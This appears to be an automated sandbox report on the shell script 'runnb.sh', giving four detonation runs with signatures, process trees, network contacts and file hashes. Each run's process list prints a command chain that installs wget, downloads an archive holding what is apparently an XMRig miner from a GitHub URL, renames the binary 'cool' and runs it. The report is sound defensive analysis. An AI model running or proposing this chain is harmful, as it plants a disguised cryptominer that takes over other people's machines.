Malware Analysis Report

2025-08-10 16:41

Sample ID 241030-qcaa3athkm
Target runnb.sh
SHA256 a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
Tags
defense_evasion discovery privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Threat Level: Shows suspicious behavior

The file runnb.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery privilege_escalation

File and Directory Permissions Modification

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Reads CPU attributes

Enumerates kernel/hardware configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 13:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

129s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.Tv8lpe /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.bJvUo4 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Ujb4X0 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.epORFa /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.4wKluk /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.tUGDrU /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.mY02xY /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.MMujmR /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.VjfRzK /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.kmQrrO /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.HpV0to /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Vh0yCy /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.TKBu8q /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Jcx9NA /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.U9uqpu /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.KjCToE /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 1.1.1.1:53 github.com udp
US 1.1.1.1:53 github.com udp
GB 195.181.164.14:443 tcp

Files

/tmp/fileutl.message.MMujmR

MD5 373fe2f2ef99005d2550a482f09a3e51
SHA1 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA256 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512 def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

debian9-armhf-20240611-en

Max time kernel

6s

Max time network

7s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.feOWda /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.hGyOFa /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.FLz5li /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.rhmRNr /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 github.com udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

debian9-mipsbe-20240611-en

Max time kernel

117s

Max time network

150s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.0ksS1M /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.9MdXSo /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.SpDNgo /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.UkZHET /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Cby9mA /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.ObiKey /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.4SnVT5 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.ChveDP /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67Wc-0000Bg-PL]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67Wi-0000Bd-5p]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-4 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67Wc-0000Bg-PL-D

MD5 29b5f65cec8f10e1d9237bfafd8cfe15
SHA1 0f553f30b89e44ffee5818aad2210fd82bf32bd3
SHA256 b86b2bb584861a5e3b8bf97967009bde0fc62280f39600fd9c234c803aaf6441
SHA512 2931246165e2cec85ca12cdd4a9c4cecf9afb4b2d8b2815b850cc9f9439289964965ca15a9641b42dca83429b371d3f769f8af6f5cc5011c691e656c78596887

/var/spool/exim4/input/hdr.724

MD5 59c8e7fe07aa10d886a5622d216dc544
SHA1 e53a9c43d1431f54893a5408a8017743ead8610b
SHA256 471604ebbe65ddc35263f86d70acc38e8a227fe2cd3bbc390dcbb6d711cfaa80
SHA512 c9ad288951a0990cee04a91e4ede557b762bce507a22a89c8552792c35c7990e15d707aa0c04b8856951689dd01d9f5edef75334ce51369421b0e453b4213bd3

/var/spool/exim4/msglog/1t67Wc-0000Bg-PL

MD5 1ff982473d7d2811859739a172bcf583
SHA1 d2bbe4a1be37b272af7d0acb7da6ed5a3495c699
SHA256 0e77dcd0195ad198b94be3603f8abf5fb697b795e4d930b76608610665ac031d
SHA512 fa52212c6ad9ef9364f22efa1095fde665d4fa4d998ab7fbcc60b41f65a582eb8b6693b0b86021dd106047eaad857703dcd093b30e604f16611321d621c8308f

/var/mail/user

MD5 595f01a473b87dcc39e302e361f6df08
SHA1 25dea5bef0cf97cf31315da0646a0397437ad072
SHA256 d85665da254724a749f3f45c509c76c71ebda1284c65d6edd8892d9da7124c33
SHA512 db87eae970e29d06417a57a6d85553745a78ca76fd4e969297a0c41791371612d7ab253633caa146d7968d36b47c59b77f8416e1d4dfd9a2e20b74ae3cb8fa2a

/var/spool/exim4/input/1t67Wc-0000Bg-PL-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t67Wc-0000Bg-PL

MD5 f7c45ad668ded36ddd10c0367e39f6f8
SHA1 3a894d2836d02d13f70fc440e809c061ed1ee328
SHA256 8f207e2aaa6d3dc408f01d993a6a759d7ddd871b95c3028dc7a1871cf3604bac
SHA512 9586fa67141a51c7363b884715708683c134402d12f6d8f757055d7e0518174ad2ea9878c79fe4ea510c5a2446ab4c5e94626e6870bac0feaa1f94dd0621e660

/var/spool/exim4/input/1t67Wi-0000Bd-5p-D

MD5 8e808517d77ff16d7f6d85e618773d5f
SHA1 c4efef4f2f7fc9bca9dfa463e04221f427e2f868
SHA256 39ea94a36c53279733341a715dad7cdead8855014ba1dec922fec93dea206ec3
SHA512 ed232da15152f741b8fddc799410dad048be911a517c180dd45ce7101414fb68e252771e1f96bf1b7767cd19b132aac0d5d35b66d50eb4eb5e7ba4699bb2ce5a

/var/spool/exim4/input/hdr.721

MD5 464af924c2dd82cb355ee78804b618f8
SHA1 7344b64dd2495ef205f0dbe3bd9c954ca7968bae
SHA256 032439411b7d4f76fab08cae52b7a24db065a64290fb6199191a7d557c62cf7f
SHA512 70e7ac84c4a59010c8b0e9e544e456a407cbf4e729996cf2f3dd3be52a491194dc0a8150813d2e514ea24e2ad6822fb0a64e429d382ca626d597f33a48484980

/var/spool/exim4/msglog/1t67Wi-0000Bd-5p

MD5 ce77a0cffed93d570d31c72c7d613582
SHA1 427e46e2284e8904a2dd035571d497e6afcff6fa
SHA256 1443ec8f0a33ab52ed79e52793f54c5ec1d5608c22acea3ad2aec7a83e6d71f0
SHA512 e95a638f5e4129bda33556d72b383fb9b2e481e787be2fdda054b4b077b3aa70ba5af6357f07acacfd6a0865d1e3091ee2013db292e200ddd79db3fdc95e4a59

/var/mail/user

MD5 defb52d953ba1b8cdd8d28da9548691d
SHA1 0dbe1daa37ad64aa25e312b909bd14d9ea1623e4
SHA256 706ae75700886c08a09231c63974a309669ab2b2a35321aca180527c913d2a55
SHA512 e89a6591192104a776660e1c42a86283a3794cf07323a3ce50ced9595bce81dfa0d1e767d679e6d5f9c3d85eb79445eaa6267c68d167e8b28bc58134a4135487

/var/spool/exim4/msglog/1t67Wi-0000Bd-5p

MD5 78dc3e8c66bd615089879ac53d483b98
SHA1 f9dd7bbbf5c7b447f39a6de989cf24a186571435
SHA256 6f405a4e3314b91bea1809bb179fba5e3cecda801b13c2ff1c48640b9984f7d7
SHA512 dcb52c5cc47f650e08bf6e08fa34fcee7b6f7c3ba864a281668929d17a1cf4a4ced83c196493a5d08a70b7b66f3216f548591e3d6bee2d84ea28554b68046f0a

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-30 13:06

Reported

2024-10-30 13:12

Platform

debian9-mipsel-20240611-en

Max time kernel

51s

Max time network

53s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.ueS1Tj /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.khLB3B /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.SYpnjZ /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.EjbMVs /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.5kH4KV /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.FM4QZg /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.X6KWVX /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.JAGxbL /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67WX-0000Bd-Tl]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67WX-0000Ba-U9]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-1 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67WX-0000Bd-Tl-D

MD5 941d420759e94a1bd868c37f625edb0e
SHA1 07a5df1665607adc1dca3eae8973194d84f33509
SHA256 4cebde6c7e7da64d826a429a647e13d1cee779b1dd21a28ba6b4038399f5ab95
SHA512 e79314a8786b2fe5f34036297e84c0ae7c042edc9566816f1ddce65ae9a173a8f90824df4e36fa9b3fd18d3dbe9577f13115cc7e5659594c777f378b5e4e23fe

/var/spool/exim4/input/1t67WX-0000Ba-U9-D

MD5 fb161a8d77589e42343a69baac6558c3
SHA1 da1d6196ad814ac6aceb4f8a5c74c42bb6bb77e0
SHA256 4ae583fdd30f59a2ce5a6f622d86ca502aea6868045b2b5b46d7e03fa0f9da4d
SHA512 dbe638525b7db65236d525169cfbdf96ff40db7dbf875419897807f141f1a23bdcb728d1a9bdaf914742722e5c7413b5ba61b5c1d5cac9baac1efe78db1c0a7a

/var/spool/exim4/input/hdr.718

MD5 48799cda21e70d63c321e8447aef7ec8
SHA1 e4b5ff6d347bc0167a579ee45f3c60214583578f
SHA256 79add92d542e684b6a9a5a1846af6e95ec7f1f4b43f0278fcaced2c7d29eb2dd
SHA512 82bcb959b4cf2f0f331bcec83a2bb616553256775028e641a5cb5b74468ffb0a875816c0b62a01383ca4b71bb92f2a8697ebb3e2c95ea876499c7c0e92578fab

/var/spool/exim4/msglog/1t67WX-0000Bd-Tl

MD5 8325c366e5037ddfc0286eda5fa5b2e2
SHA1 542ca7ae5ed8e1b1d405b6362ce51ce2960fff3a
SHA256 43cc8dd066396ff583c39678b6844c019ad2e2222dc0a6fcdf8415a7df08ffd3
SHA512 e22a836ef72c3d7816ab190fda793c67d9f526ea008ad9ed627da70dbc5ea640b5447f5b174fa937d7583e10334eb7b4a3e3162d7f3d4bda1fd37fb4f3661718

/var/spool/exim4/msglog/1t67WX-0000Ba-U9

MD5 2633f88076d9fc2543fa50f203e0d08f
SHA1 ad6b4fd63cbc7c131c66639152d4f0a16e5f58b8
SHA256 750d8a4120dbea512b80ba7b9b284d4c2b52009c2a52d1d106dab24f0bd1eac9
SHA512 a12152884afdcdb8e2bcad89690f5e105683ce460876123c41a3c2bbb0d65d6e2ba19e394b262bd3bd3a7c7c74397f6c380ec577b49a02ce474cbb12a7f90ef6

/var/mail/user

MD5 2e64547594cb07a79be6167095b3421c
SHA1 ab83381e1eb624ee06dbb5513cfc863fb2ec0099
SHA256 7cda1aee71c8b2e2ce4133c99388f0e42abc7bd491fc92691db8375ab70933ae
SHA512 5d9b98f3a027e785edf86ef07acab7978ac5e1cc48c412c2c73fd7a61836ed779ec7f57831a7f4d44d57ae0756cc11f0139f36fb769a0917210da0964b57e55e

/var/spool/exim4/input/1t67WX-0000Ba-U9-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/mail/user

MD5 3306e338f0de9348470695cf0c09db1f
SHA1 12d9b6006acd4b506cfa50c89ecf0b84e2deb018
SHA256 a8a474e7234e1a7c4f33c145018f2d235fe2a2a917eea63579cc018384364eac
SHA512 99f07c204ed386392f5475be50302f644a0197cd65b504c94ede2c169f04d4187d4a5f163094648f14c987913457cf2918ec283b93811dbc19c39971db6e15c3

/var/spool/exim4/msglog/1t67WX-0000Ba-U9

MD5 e06795efeae2b189486bac86b73396f5
SHA1 7cedd0a0713397d1d097712f49dfe56ce0280a48
SHA256 c6a38cfc3b0bcd0da3e28339e14c1020e95013cb9ec230580bac622e3efc1485
SHA512 a601fe93788026af3440dbaab44747e3915fccf44956526cfd79f676553e6815f45dd697e7dac099a5008be9660f448415bb71afdf990aed6b6bba3adbbf98ab

/var/spool/exim4/msglog/1t67WX-0000Bd-Tl

MD5 ea08c55f299f53254a3c5d4c3e80cacd
SHA1 4dd0cea75a44decb69821b37ae43ad3b31bf266b
SHA256 d574187e37c7e4c775b3f08b1fc37fb678c54fd6af681f947808c9e474c7c1b9
SHA512 d783a6ab3b30114c7a5c19ac4c8dc95abf482967d0b5f061121e24e9132bc7ab894f51b684664d1899a100814548c5f7ab7769b38d52affbebb8ca9c14dc94ee